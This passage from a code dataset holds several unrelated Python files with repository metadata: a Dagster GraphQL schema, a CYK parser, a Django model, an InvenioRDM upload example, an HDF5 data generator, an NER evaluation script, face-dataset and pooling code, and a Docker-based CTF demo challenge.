GrapheneStepKind.UNRESOLVED_COLLECT:\n return \"This is a collect step that is not yet resolved\"\n else:\n return None\n\n\nclass GrapheneExecutionStep(graphene.ObjectType):\n key = graphene.NonNull(graphene.String)\n inputs = non_null_list(GrapheneExecutionStepInput)\n outputs = non_null_list(GrapheneExecutionStepOutput)\n solidHandleID = graphene.NonNull(graphene.String)\n kind = graphene.NonNull(GrapheneStepKind)\n metadata = non_null_list(GrapheneMetadataItemDefinition)\n\n class Meta:\n name = \"ExecutionStep\"\n\n def __init__(self, external_execution_plan, execution_step_snap):\n super().__init__()\n self._external_execution_plan = check.inst_param(\n external_execution_plan, \"external_execution_plan\", ExternalExecutionPlan\n )\n self._plan_snapshot = external_execution_plan.execution_plan_snapshot\n self._step_snap = check.inst_param(\n execution_step_snap, \"execution_step_snap\", ExecutionStepSnap\n )\n\n def resolve_metadata(self, _graphene_info: ResolveInfo):\n return [\n GrapheneMetadataItemDefinition(key=mdi.key, value=mdi.value)\n for mdi in self._step_snap.metadata_items\n 
]\n\n def resolve_inputs(self, _graphene_info: ResolveInfo):\n return [\n GrapheneExecutionStepInput(inp, self._external_execution_plan)\n for inp in self._step_snap.inputs\n ]\n\n def resolve_outputs(self, _graphene_info: ResolveInfo):\n return [GrapheneExecutionStepOutput(out) for out in self._step_snap.outputs]\n\n def resolve_key(self, _graphene_info: ResolveInfo):\n return self._step_snap.key\n\n def resolve_solidHandleID(self, _graphene_info: ResolveInfo):\n return self._step_snap.node_handle_id\n\n def resolve_kind(self, _graphene_info: ResolveInfo):\n return self._step_snap.kind.value\n\n\nclass GrapheneExecutionPlan(graphene.ObjectType):\n steps = non_null_list(GrapheneExecutionStep)\n artifactsPersisted = graphene.NonNull(graphene.Boolean)\n\n class Meta:\n name = \"ExecutionPlan\"\n\n def __init__(self, external_execution_plan):\n super().__init__()\n self._external_execution_plan = check.inst_param(\n external_execution_plan, external_execution_plan, ExternalExecutionPlan\n )\n\n def resolve_steps(self, _graphene_info: ResolveInfo):\n return [\n GrapheneExecutionStep(\n self._external_execution_plan,\n self._external_execution_plan.get_step_by_key(step.key),\n )\n for step in self._external_execution_plan.get_steps_in_plan()\n ]\n\n def resolve_artifactsPersisted(self, _graphene_info: ResolveInfo):\n return self._external_execution_plan.execution_plan_snapshot.artifacts_persisted\n\n\ntypes = [\n GrapheneExecutionPlan,\n GrapheneExecutionStep,\n GrapheneExecutionStepInput,\n GrapheneExecutionStepOutput,\n GrapheneStepKind,\n]\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-graphql/dagster_graphql/schema/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"21858699284","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 28 13:20:19 2022\r\n\r\n@author: Dang Dinh NGUYEN\r\n\"\"\"\r\n\r\nimport os\r\nimport time\r\nfrom tabulate import tabulate\r\nEPSILON = \"&\"\r\n\r\n########################################################################\r\n########################################################################\r\n\r\nclass FileHandler:\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def readFile(self, filePath):\r\n lines=[]\r\n if(os.path.isfile(filePath)):\r\n try:\r\n with open(filePath) as file:\r\n lines = [line.rstrip() for line in file]\r\n except IOError as e:\r\n print(\"File could not be opened.\")\r\n exit(0)\r\n else:\r\n print('{} :File was not found in the specified path.'.format(filePath))\r\n exit(0)\r\n return lines\r\n\r\n def parseFile(self,lines):\r\n ''' \r\n Line 1 to end: Productions in form of\r\n (Current State -> Next State)\r\n '''\r\n productions = lines[0:]\r\n for i in range(len(productions)):\r\n productions[i] = productions[i].rstrip().split('->')\r\n\r\n parsedLines = {'productions':productions}\r\n return parsedLines\r\n \r\nclass CYK:\r\n def __init__(self):\r\n pass\r\n \r\n def isRecognised(self, inputString, parsedLines):\r\n n = len(inputString)\r\n productions = parsedLines['productions']\r\n source = productions[1][0]\r\n print(\"source \", source)\r\n table = [[set([]) for i in range(n)] for j in range(n)] \r\n \r\n for j in range(0,n):\r\n for production in productions:\r\n lhs = production[0]\r\n rhs = production[1]\r\n #print('{}\\t {}'.format(lhs, rhs))\r\n if (len(rhs) == 1 and rhs.islower()) and rhs == inputString[j]:\r\n table[j][j].add(lhs)\r\n \r\n for 
i in range(j,-1,-1):\r\n for k in range(i,j+1):\r\n for production in productions:\r\n lhs = production[0]\r\n rhs = production[1] \r\n try:\r\n if (len(rhs) == 2) and (rhs[0] in table[i][k]) and (rhs[1] in table[k + 1][j]):\r\n table[i][j].add(lhs)\r\n except:\r\n pass\r\n \r\n if len(table[0][n-1]) != 0 and source in table[0][n-1] :\r\n print(\"True\")\r\n else:\r\n print(\"False\")\r\n \r\n \r\n for i in range(1,n):\r\n table[i] = sorted(table[i],reverse = True)\r\n \r\n result = []\r\n for i in range(0,n):\r\n l = []\r\n for j in range(0,n):\r\n l.append(list(table[j][i]))\r\n result.append(l)\r\n \r\n headers = (list(inputString))\r\n print('')\r\n print(tabulate(result,headers,tablefmt = \"orgtbl\"))\r\n print('')\r\n \r\n \r\ndef main():\r\n \r\n fh = FileHandler()\r\n cyk = CYK()\r\n FilePath = input('Enter the automata file path: ')\r\n lines = fh.readFile(FilePath)\r\n \r\n inputString = input('Enter input String: ')\r\n inputString = inputString.rstrip()\r\n \r\n parsedLines = fh.parseFile(lines)\r\n print('Productions List:')\r\n for production in parsedLines['productions']:\r\n print('\\t', production)\r\n #time.sleep(2)\r\n print('Details loaded')\r\n cyk.isRecognised(inputString, parsedLines)\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n ","repo_name":"Dang-Dinh-NGUYEN/LangagesFormels","sub_path":"TP2.py","file_name":"TP2.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29205436190","text":"from django.db import models\r\nfrom mptt.fields import TreeForeignKey\r\nfrom mptt.models import MPTTModel\r\n\r\n\r\nclass TransactionType(models.Model):\r\n name = models.CharField(max_length=50, unique=True)\r\n slug = models.CharField(max_length=20, unique=True)\r\n created_on = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n class Meta:\r\n verbose_name_plural = \"Transaction Types\"\r\n\r\n\r\nclass Transaction(MPTTModel):\r\n transaction_id = models.IntegerField(primary_key=True)\r\n type = models.ForeignKey(TransactionType, on_delete=models.CASCADE)\r\n parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True,\r\n on_delete=models.SET_NULL)\r\n amount = models.FloatField(max_length=50, default=0)\r\n created_on = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return \"{} {} {}\".format(self.transaction_id, self.type, self.amount)\r\n\r\n def get_parent_id(self):\r\n if self.parent:\r\n return self.parent.transaction_id\r\n else:\r\n return None\r\n","repo_name":"jayaswalayush/PocketAce","sub_path":"transaction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6643456658","text":"from storm_client_invenio import InvenioRDM\nfrom storm_client_invenio.models.record import Record, RecordDraft\n\n#\n# 1. Create a InvenioRDM Client instance.\n#\nservice = InvenioRDM(\n \"https://invenio-instance/api\",\n \"\",\n)\n\n#\n# 2. 
Create a Record Draft\n#\n\n#\n# 2.1 Create draft object\n#\nrecord_draft = RecordDraft(\n dict(\n metadata=dict(\n title=\"Example draft\",\n description=\"Example draft description\",\n contributors=[\n dict(\n person_or_org=dict(\n family_name=\"Some\",\n given_name=\"Person\",\n name=\"Some, Person\",\n type=\"personal\",\n ),\n role=dict(id=\"other\", title=dict(en=\"Other\")),\n )\n ],\n creators=[\n dict(\n person_or_org=dict(\n family_name=\"Some\",\n given_name=\"Person\",\n name=\"Some, Person\",\n type=\"personal\",\n )\n )\n ],\n publisher=\"InvenioRDM Client\",\n resource_type=dict(id=\"software\", title=dict(en=\"Software\")),\n rights=[\n dict(\n id=\"cc-by-4.0\",\n )\n ],\n dates=dict(\n date=\"2020-05-05\", type=dict(id=\"issued\", title=dict(en=\"Issued\"))\n ),\n publication_date=\"2021-12-08\",\n )\n )\n)\n\n#\n# 2.1 Create draft record in the REST API\n#\ncreated_draft = service.records.draft().create(record_draft)\nprint(created_draft)\n\n#\n# 2.2 Draft files\n#\nupdated_draft = service.records.files(created_draft).upload_files(\n {\n \"alice.txt\": \"data/alice.txt\",\n \"creative-commons.png\": \"data/creative-commons.png\",\n },\n commit=True,\n)\n\n#\n# 3. Publish the record draft\n#\nrecord = service.records.draft().publish(updated_draft)\nprint(record)\n\n\n#\n# 4. Search Draft and Records\n#\nprint(service.records.search().query(q=\"is_published: true\"))\n\n# Search only for user specific records\nuser_records = service.records.search(user_records=True).query()\nfor record in user_records:\n if type(record) == Record:\n print(\"Record\")\n print(type(record))\n print(record.links.draft)\n\n elif type(record) == RecordDraft:\n print(\"Record Draft\")\n print(type(record))\n print(record.links.draft)\n","repo_name":"storm-platform/storm-client-invenio","sub_path":"examples/record-deposit.py","file_name":"record-deposit.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991190448","text":"#!/usr/bin/env python\n# coding: utf-8\n# pylint: disable=unused-argument, too-many-arguments, too-many-locals\n\"\"\"\nSmall script for generating hdf5 test files, including FG, G\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport sys\n\nimport h5py\nimport numpy\nfrom distributed import Lock\n\nfrom .dask_wrapper import dask_wrapper, set_up_dask, tear_down_dask\nfrom .fourier_transform import make_subgrid_from_sources\n\nlog = logging.getLogger(\"fourier-data-generater-logger\")\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.StreamHandler(sys.stdout))\n\n\n@dask_wrapper\ndef direct_ft_chunk_work(\n G_2_path, chunk_slice, sources, chunksize, N, use_dask=False, **kwargs\n):\n \"\"\"\n Calculate the value of a chunk of direct fourier transform and\n write to hdf5\n\n :param G_2_path: the hdf5 file path of G\n :param chunk_slice: slice of hdf5 chunk\n :param sources: sources array\n :param chunksize: size of chunk\n :param N: whole data size\n\n \"\"\"\n\n offs = [s.start - N // 2 + chunksize // 2 for s in chunk_slice]\n chunk_G = make_subgrid_from_sources(sources, N, chunksize, offs)\n\n # lock\n if use_dask:\n lock = Lock(G_2_path)\n lock.acquire()\n\n with h5py.File(G_2_path, \"r+\") as f:\n dataset = f[\"G_data\"]\n dataset[chunk_slice[0], chunk_slice[1]] = chunk_G / (N * N)\n\n if use_dask:\n lock.release()\n\n\ndef generate_data_hdf5(\n npixel, G_2_path, FG_2_path, chunksize_G, chunksize_FG, client=None\n):\n \"\"\"\n Generate standard data G and FG with 
hdf5\n\n :param sparse_ft_class: StreamingDistributedFFT class object\n :param G_2_path: the hdf5 file path of G\n :param FG_2_path: the hdf5 file path of FG\n :param chunksize: size of chunk\n :param client: dask client\n\n :returns: G_2_path, FG_2_path\n \"\"\"\n\n if not os.path.exists(FG_2_path):\n source_count = 10\n sources = numpy.array(\n [\n (\n numpy.random.rand()\n * npixel\n * npixel\n / numpy.sqrt(source_count)\n / 2,\n numpy.random.randint(-npixel // 2, npixel // 2 - 1),\n numpy.random.randint(-npixel // 2, npixel // 2 - 1),\n )\n for _ in range(source_count)\n ]\n )\n f = h5py.File(FG_2_path, \"w\")\n FG_dataset = f.create_dataset(\n \"FG_data\",\n (npixel, npixel),\n dtype=\"complex128\",\n chunks=(chunksize_FG, chunksize_FG),\n )\n # write data point by point\n for i, y, x in sources:\n FG_dataset[int(y) + npixel // 2, int(x) + npixel // 2] += (\n i / npixel / npixel\n )\n f.close()\n\n if client is None:\n use_dask = False\n else:\n use_dask = True\n if not os.path.exists(G_2_path):\n # create a empty hdf5 file\n f = h5py.File(G_2_path, \"w\")\n G_dataset = f.create_dataset(\n \"G_data\",\n (npixel, npixel),\n dtype=\"complex128\",\n chunks=(chunksize_G, chunksize_G),\n )\n chunk_list = []\n for chunk_slice in G_dataset.iter_chunks():\n chunk_list.append(\n direct_ft_chunk_work(\n G_2_path,\n chunk_slice,\n sources,\n chunksize_G,\n npixel,\n use_dask=use_dask,\n nout=1,\n )\n )\n f.close()\n\n if use_dask:\n chunk_list = client.compute(chunk_list, sync=True)\n\n return G_2_path, FG_2_path\n\n\ndef cli_parser():\n \"\"\"\n Parse command line arguments\n\n :return: argparse\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"generate G and FG hdf5 file for test\",\n fromfile_prefix_chars=\"@\",\n )\n\n parser.add_argument(\n \"--N\", type=int, default=1024, help=\"hdf5 chunksize for G\"\n )\n\n parser.add_argument(\n \"--hdf5_chunksize_G\",\n type=int,\n default=256,\n help=\"hdf5 chunksize for G\",\n )\n\n parser.add_argument(\n \"--hdf5_chunksize_FG\",\n type=int,\n default=256,\n help=\"hdf5 chunksize for FG\",\n )\n\n parser.add_argument(\n \"--hdf5_prefix\", type=str, default=\"./\", help=\"hdf5 path prefix\"\n )\n\n return parser\n\n\ndef main(args):\n \"\"\"\n Main function to generate G and FG hdf5 file\n\n The hdf5 file naming follows the format of G/FG_N_chunksize.h5\n \"\"\"\n\n # Fixing seed of numpy random\n numpy.random.seed(123456789)\n\n scheduler = os.environ.get(\"DASK_SCHEDULER\", None)\n log.info(\"Scheduler: %s\", scheduler)\n\n dask_client = set_up_dask(scheduler_address=scheduler)\n generate_data_hdf5(\n npixel=args.N,\n G_2_path=f\"{args.hdf5_prefix}/\\\n G_{args.N}_{args.hdf5_chunksize_G}.h5\",\n FG_2_path=f\"{args.hdf5_prefix}/\\\n FG_{args.N}_{args.hdf5_chunksize_FG}.h5\",\n chunksize_G=args.hdf5_chunksize_G,\n chunksize_FG=args.hdf5_chunksize_FG,\n client=dask_client,\n )\n tear_down_dask(dask_client)\n\n\nif __name__ == \"__main__\":\n parser_args = cli_parser().parse_args()\n main(parser_args)\n","repo_name":"ska-telescope/ska-sdp-distributed-fourier-transform","sub_path":"src/ska_sdp_exec_swiftly/generate_hdf5.py","file_name":"generate_hdf5.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37932888331","text":"'''\nCOMP700 TEXT AND VISION INTELLIGENCE\nASSIGNMENT 1 - NAMED ENTITY RECOGNITION (NER)\nKelly Luo (17985065)\n'''\n\nfrom numpy import *\nimport nltk\nimport os\n\n# Variables for True Positive and False Positive for 
ORGANIZATION label\nO_TP = 0\nO_FP = 0\nOP_FP = 0\nOL_FP = 0\n\n# Variables for True Positive and False Positive for PERSON label\nP_TP = 0\nP_FP = 0\nPO_FP = 0\nPL_FP = 0\n\n# Variables for True Positive and False Positive for LOCATION label\nL_TP = 0\nL_FP = 0\nLO_FP = 0\nLP_FP = 0\n\nTP = 0\nFN = 0\nFP = 0\ndat_array = []\nresults_array = []\n\n\n# Method that analyses the article text and chunk with category labels and adds into an array for the results\ndef chunk_label_data(txt_writing):\n for sent in nltk.sent_tokenize(txt_writing): # for all the words in the text article\n for chunk in nltk.ne_chunk(nltk.pos_tag(nltk.word_tokenize(sent))): # for all the connected chunks\n if hasattr(chunk, 'label'):\n if chunk.label() == 'GPE': # changing label to be LOCATION if it is GPE\n resultLabel = ' '.join(c[0] for c in chunk), \"LOCATION\"\n results_array.append(resultLabel)\n else:\n resultLabel = ' '.join(c[0] for c in chunk), chunk.label()\n results_array.append(resultLabel)\n\n\n# Method that compares the NER evaluation between each match between the labelled results array (predicted)\n# with the dat file (actual)\ndef ner_evaluation_and_comparison():\n global TP, FP, FN\n datLineCount = 0\n for entry in results_array:\n try:\n dat_array[datLineCount]\n except IndexError: # There are no more lines in the dat file\n FP += 1\n continue\n\n # Case 1: Both Predicted and Actual text are the same\n if entry[0].lower() == dat_array[datLineCount][0].lower():\n\n # Case 1.1: Both Predicted and Actual text are the same BUT Labels are the same\n if entry[1] == dat_array[datLineCount][1] or len(entry[1]) == len(dat_array[datLineCount][1]):\n correct_label_matrix_count(entry[1])\n TP += 1\n datLineCount += 1\n\n # Case 1.2: Both Predicted and Actual text are the same BUT Labels are different\n else:\n wrong_label_matrix_count(((dat_array[datLineCount][1])[:1]).capitalize(), entry[1][:1])\n FP += 1\n datLineCount += 1\n\n # Case 2: Predicted text is missing a word from the Actual text\n elif entry[0].lower() in dat_array[datLineCount][0].lower() and len(entry[0]) < len(dat_array[datLineCount][0]):\n FP += 1\n datLineCount += 1\n\n # Case 3: Predicted text has an extra word compared to the Actual text\n elif dat_array[datLineCount][0].lower() in entry[0].lower() and len(entry[0]) > len(dat_array[datLineCount][0]):\n FP += 1\n datLineCount += 1\n\n # Case 4: The current comparison between predicted text and actual test is not a match\n else:\n for x in range(0,3): # Loop for the next following 3 lines to see if there is a match in text\n if (datLineCount + x + 1) > len(dat_array): # Stop the loop if there is no more lines\n FP += 1\n break\n\n # Case 4.1: Both Predicted and Actual text are the same\n if entry[0].lower() == dat_array[datLineCount + x][0].lower():\n\n # Case 4.2: Both Predicted and Actual text are the same BUT Labels are the same\n if entry[1] == dat_array[datLineCount + x][1] or len(entry[1]) == len(dat_array[datLineCount + x][1]):\n correct_label_matrix_count(entry[1])\n TP += 1\n datLineCount = datLineCount + x + 1\n\n # Case 5: When lines in dat file is skipped, this mean NER was not identified\n if x > 0:\n FN += x\n break\n\n # Case 4.3: Both Predicted and Actual text are the same BUT Labels are different\n else:\n wrong_label_matrix_count(((dat_array[datLineCount][1])[:1]).capitalize(), entry[1][:1])\n FP += 1\n datLineCount = datLineCount + x + 1\n\n # Case 5: When lines in actual values is skipped, this means that NER did not identify\n if x > 0:\n FN += x\n break\n\n # Case 6: 
There are no matches in the following 3 lines in actual values therefore aditional identification\n if x == 4:\n FP += 1\n\n\n# Method to count the correct category labels\ndef correct_label_matrix_count(results_label):\n global O_TP, P_TP, L_TP\n\n if results_label == 'ORGANIZATION':\n O_TP += 1\n elif results_label == 'PERSON':\n P_TP += 1\n elif results_label == 'LOCATION':\n L_TP += 1\n\n\n# Method to count the incorrect category labels\ndef wrong_label_matrix_count(actual_label, pred_label):\n global OP_FP, OL_FP, PO_FP, PL_FP, LO_FP, LP_FP\n\n if actual_label == 'O':\n if pred_label == 'P':\n OP_FP += 1\n elif pred_label == 'L' or pred_label == 'G':\n OL_FP += 1\n elif actual_label == 'P':\n if pred_label == 'O':\n PO_FP += 1\n elif pred_label == 'L' or pred_label == 'G':\n PL_FP += 1\n elif actual_label == 'L' or actual_label == 'G':\n if pred_label == 'O':\n LO_FP += 1\n elif pred_label == 'P':\n LP_FP += 1\n\n\n# Method to calculate Recall in percentage\ndef calculate_recall(tp, fn):\n return (tp / (tp + fn))*100\n\n\n# Method to calculate Precision in percentage\ndef calculate_precision(tp, fp):\n return (tp / (tp + fp))*100\n\n\n# Method to calculate F Value in percentage\n# Note: Beta value is 1\ndef calculate_Fvalue(precision, recall):\n return (precision * recall)/(precision + recall)\n\n\n# Method to print overall confusion matrix and category matrix\ndef print_confusion_matrix():\n print(\"\\r\\n------------- Confusion Matrix -------------\")\n confusionMatrix = array([[str(' '), str('Pos'), str('Neg')],\n ['Pos','TP='+ str(TP), 'FP='+ str(FP)],\n ['Pos','FN='+ str(FN), 'N/A']])\n print(confusionMatrix)\n\n print(\"\\r\\n------------- Category Confusion Matrix -------------\")\n confusionMatrix = array([[str(' '), 'O', 'P', 'L'],\n ['O', str(O_TP), str(PO_FP) ,str(LO_FP)],\n ['P', str(OP_FP), str(P_TP) ,str(LP_FP)],\n ['L', str(OL_FP), str(PL_FP) ,str(L_TP)]])\n print(confusionMatrix)\n\n O_FP = OP_FP + OL_FP\n P_FP = PO_FP + PL_FP\n L_FP = LO_FP + LP_FP\n print(\"\\r\\nCategory Totals:\")\n print(\"ORGANISATION ------> TP:\" + str(O_TP) + \" ---- FP:\" + str(O_FP))\n print(\"PERSON ------> TP:\" + str(P_TP) + \" ---- FP:\" + str(P_FP))\n print(\"LOCATION ------> TP:\" + str(L_TP) + \" ---- FP:\" + str(L_FP))\n\n\n# Method to print the overall FPR calculations\ndef print_FPR():\n print(\"\\r\\n------------- FPR Calculations -------------\")\n precision = calculate_precision(TP, FP)\n print(\"Overall Precision (P): \" + str(\"{:.2f}\".format(precision)) + \"%\")\n recall = calculate_recall(TP, FN)\n print(\"Overall Recall (R): \" + str(\"{:.2f}\".format(recall)) + \"%\")\n print(\"Overall F Value (F): \" + str(\"{:.2f}\".format(calculate_Fvalue(precision, recall))) + \"%\")\n\n # print(\"\\r\\nCategory Totals:\")\n # org_prec = calculate_precision(O_TP, O_FP)\n # org_recall = calculate_recall(O_TP, O_FN)\n # print(\"ORGANISATION ------> P:\" + str(org_prec) + \"% ---- R:\" + (str(O_FP)) + \"% ---- F:\" + (str(OP_FP + OL_FP)) + \"%\")\n # print(\"PERSON ------> TP:\" + str(P_TP) + \" ---- FP:\" + (str(PO_FP + PL_FP)))\n # print(\"LOCATION ------> TP:\" + str(L_TP) + \" ---- FP:\" + (str(LO_FP + LP_FP)))\n\n\n# Method to read and filter data from the dat files into an array\ndef read_dat_file(dat_writing):\n # count = 0\n for line in dat_writing:\n if line.strip() == '': # if the line is empty\n # count += 1\n # print(\"---SKIPPED LINE \" + str(count))\n continue\n\n l = line.split('(')\n\n # Remove the empty spaces in start and end, '\\n' and '(' character\n try:\n l[0] = 
l[0].strip()\n l[1] = l[1].strip()\n l[1] = (l[1])[:-1]\n if 'GPE' in l[1]: # Change GPE to LOCATION when storing into dat_array\n l[1] = 'LOCATION'\n except IndexError: # Ignore the line if missing text or label\n continue\n\n dat_array.append(l)\n # count += 1\n # print(\"LINE \" + str(count) + \" EXTRACTED\")\n\n\n\"\"\" ------------------------------------ CODE EXECUTION BELOW ----------------------------------------- \"\"\"\n\n# Set path to your own path with all the dat and txt files in the same folder\ndatasetPath = 'C:/Users/LuoKe/OneDrive/Documents/EntireDataset/'\nfiles = array(os.listdir(datasetPath))\n\nfileCount = 0;\nwhile True:\n if fileCount >= 554:\n break\n\n # Keeping reference to the current file and the next file\n currentFile = files[fileCount].split('.')\n if fileCount + 1 < 554:\n nextFile = files[fileCount + 1].split('.')\n\n if files[fileCount].endswith('.dat'):\n # Check if the next file is a .txt file with same student ID number\n if currentFile[0] == nextFile[0] and nextFile[1] == 'txt':\n print(\"------ Processing file: \" + currentFile[0] + \" ------ \\r\\n\\r\\n\")\n\n try:\n datFile = open(os.path.join(datasetPath, files[fileCount]), 'r', encoding='UTF8')\n datWriting = datFile.readlines()\n except UnicodeDecodeError:\n datFile = open(os.path.join(datasetPath, files[fileCount]), 'r')\n datWriting = datFile.readlines()\n\n try:\n txtFile = open(os.path.join(datasetPath, files[fileCount + 1]), 'r', encoding='UTF8')\n txtWriting = txtFile.read()\n except UnicodeDecodeError:\n txtFile = open(os.path.join(datasetPath, files[fileCount + 1]), 'r')\n txtWriting = txtFile.read()\n\n read_dat_file(datWriting)\n chunk_label_data(txtWriting)\n ner_evaluation_and_comparison()\n\n dat_array.clear()\n results_array.clear()\n fileCount += 2\n\nprint_confusion_matrix()\nprint_FPR()","repo_name":"kelly-luo/NER-Evaluation","sub_path":"NER-Evaluation.py","file_name":"NER-Evaluation.py","file_ext":"py","file_size_in_byte":10586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12148428685","text":"import shlex\nfrom pathlib import Path\n\nfrom aiohttp import web\n\nimport r8.challenge_mixins\n\n\nclass DockerHelloWorld(r8.challenge_mixins.DockerChallenge):\n title = \"Docker Container Example\"\n\n dockerfile = Path(__file__).parent / \"docker-helloworld\"\n\n async def description(self, user: str, solved: bool):\n return r8.util.media(\n None,\n \"\"\"\n
\n \n \n
\n
\n \"\"\"\n + r8.util.challenge_form_js(self.id),\n )\n\n async def handle_post_request(self, user: str, request: web.Request):\n json = await request.json()\n try:\n return await self.docker_run(user, *shlex.split(json.get(\"command\", \"\")))\n except r8.challenge_mixins.DockerError as e:\n raise web.HTTPInternalServerError(reason=str(e))\n","repo_name":"mhils/r8","sub_path":"r8/builtin_challenges/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"18983075837","text":"# 정수 1개가 입력되었을 때, 음(minus)/양(plus)/0(zero)과 짝(even)/홀(odd)을 출력해보자.\n\ndef minus_plus(num):\n if num > 0:\n print(\"plus\")\n elif num == 0:\n print(\"zero\")\n else:\n print(\"minus\")\n\ndef even_odd(num):\n if num % 2 == 0:\n print(\"even\")\n else:\n print(\"odd\")\n\ndef init():\n num = int(input())\n\n minus_plus(num)\n even_odd(num)\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/codeup100/codeup67.py","file_name":"codeup67.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6497018507","text":"from src.core.plateau import Plateau\nfrom src.core.rover import Rover\nfrom src.utils.logger import get_logger\n\nlogger = get_logger()\n\n\ndef normalize_input_string(input_str) -> list:\n \"\"\"\n Convert input string letters to uppercase and ensure there are spaces between characters.\n\n Args:\n input_str (str): The original input string.\n\n Returns:\n str: The normalized input string.\n \"\"\"\n input_str = input_str.upper()\n\n formatted_parts = []\n for part in input_str.strip().split(\"\\n\"):\n if len(part) > 1 and not part.isdigit():\n formatted_parts.append(tuple(part.strip().split()))\n else:\n formatted_parts.append(tuple(part.split()))\n return formatted_parts\n\n\ndef split_adjacent_chars(chars):\n \"\"\"\n Split strings with more than one character into individual characters.\n\n Args:\n chars (list of str): List of characters and strings.\n\n Returns:\n list of str: List of individual characters.\n \"\"\"\n result = []\n for char in chars:\n # Extend the result list with individual characters from each string\n result.extend(tuple(char))\n return result\n\n\ndef validate_orientation(orientation):\n \"\"\"\n Validate rover orientation.\n\n Args:\n orientation (str): The rover orientation.\n\n Raises:\n ValueError: If orientation is invalid.\n \"\"\"\n if orientation not in [\"N\", \"E\", \"S\", \"W\"]:\n raise ValueError(f\"Invalid orientation {orientation}\")\n\n\ndef validate_commands(commands):\n \"\"\"\n Validate rover commands.\n\n Args:\n commands (list of str): The rover commands.\n\n Raises:\n ValueError: If any command is invalid.\n \"\"\"\n if any(command not in [\"L\", \"R\", \"M\"] for command in commands):\n raise ValueError(f\"Invalid commands {commands}\")\n\n\ndef process_input(input_str):\n \"\"\"\n Process the input string.\n\n Args:\n input_str (str): The input string.\n\n Returns:\n tuple: A tuple containing the plateau and a list of rovers and their commands.\n \"\"\"\n try:\n lines = normalize_input_string(input_str)\n plateau_width, plateau_height = map(int, lines[0])\n plateau = Plateau(plateau_width, plateau_height)\n rovers_and_commands = []\n\n for i in range(1, len(lines), 2):\n x, y, orientation = split_adjacent_chars(lines[i])\n validate_orientation(orientation)\n x, y = int(x), int(y)\n rover = Rover(x, y, 
orientation, plateau)\n commands = split_adjacent_chars(lines[i + 1])\n validate_commands(commands)\n rovers_and_commands.append((rover, commands))\n\n return rovers_and_commands\n except ValueError as ve:\n print(f\"Invalid input: {ve}\")\n logger.exception(f\"Invalid input: {ve}\")\n raise\n","repo_name":"NicolaGernone/Test-Rover","sub_path":"src/processes/process_input.py","file_name":"process_input.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39483086909","text":"import re\n\nimport cv2\nimport os\nimport numpy as np\nfrom PIL import Image\n\nid = 1\ncount = 10\ndirPath = \"\"\nlistFiles = []\n\nfor (dirPath, dirnames, filenames) in os.walk(\n # \"C:/Users/Ichanskiy/PycharmProjects/FaceIdWebCam/FacialRecognition/input/\"):\n \"D:/Diplom/testing/input/\"):\n listFiles = filenames\n print(list)\n print(dirPath)\n print(dirnames)\n break\n\nface_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nlistFiles.sort(reverse=True)\nfor fileName in listFiles:\n im = Image.open(dirPath + fileName)\n idImage = fileName.replace(\".jpg\", \"\")\n idImage = re.findall(\"\\d+\", idImage)[0]\n im2arr = np.array(im)\n\n img = cv2.flip(im2arr, 1) # flip video image vertically\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray, 1.3, 5)\n\n for i in range(1, count):\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n # Save the captured image into the datasets folder\n # cv2.imwrite(\"C:/Users/Ichanskiy/PycharmProjects/FaceIdWebCam/FacialRecognition/dataset/\" + str(\n cv2.imwrite(\"D:/Diplom/testing/dataset/\" + str(\n idImage) + '.' + str(i) + \".jpg\", gray[y:y + h, x:x + w])\n # count += 1\n id = id + 1\n","repo_name":"Ichanskiy/FaceIdWebCam","sub_path":"FacialRecognition/01_face_dataset.py","file_name":"01_face_dataset.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14816107023","text":"import cv2\nimport numpy as np\n\ndef AveragePooling(_img):\n img = _img.copy()\n result = np.zeros_like(img)\n for i in range(img.shape[0]//8):\n ind_11 = i * 8\n ind_12 = ind_11 + 8\n for j in range(img.shape[1]//8):\n ind_21 = j * 8\n ind_22 = ind_21 + 8\n result[ind_11:ind_12, ind_21:ind_22, 0] = np.mean(img[ind_11:ind_12, ind_21:ind_22, 0])\n result[ind_11:ind_12, ind_21:ind_22, 1] = 